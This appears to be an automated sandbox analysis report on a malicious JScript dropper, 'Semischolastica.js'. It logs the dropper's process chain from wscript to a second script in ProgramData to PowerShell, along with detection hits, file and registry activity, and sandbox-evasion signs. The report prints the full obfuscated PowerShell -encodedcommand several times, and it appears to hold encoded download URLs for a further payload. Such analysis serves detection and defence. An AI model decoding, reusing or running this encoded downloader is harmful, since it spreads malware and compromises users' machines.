FEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQ
Very long command line found
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7544
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7544
Source: Process Memory Space: powershell.exe PID: 6908, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Semischolastica.jsInitial sample: Strings found which are bigger than 50
Source: Semischolastica.jsReversingLabs: Detection: 13%
Source: Semischolastica.jsVirustotal: Detection: 30%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQ
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsaixmmc.yur.ps1Jump to behavior
Source: classification engineClassification label: mal92.evad.winJS@6/6@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbs089 source: powershell.exe, 00000003.00000002.965250834.0000021D7D1A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb9 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbGM= source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7D004000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdbY source: powershell.exe, 00000003.00000002.964639964.0000021D7CFA0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000003.00000002.965436092.0000021D7D24F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000003.00000002.964639964.0000021D7CFBA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript", ""C:\ProgramData\WeigelasScribbleable.js", "", "open", "0");
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
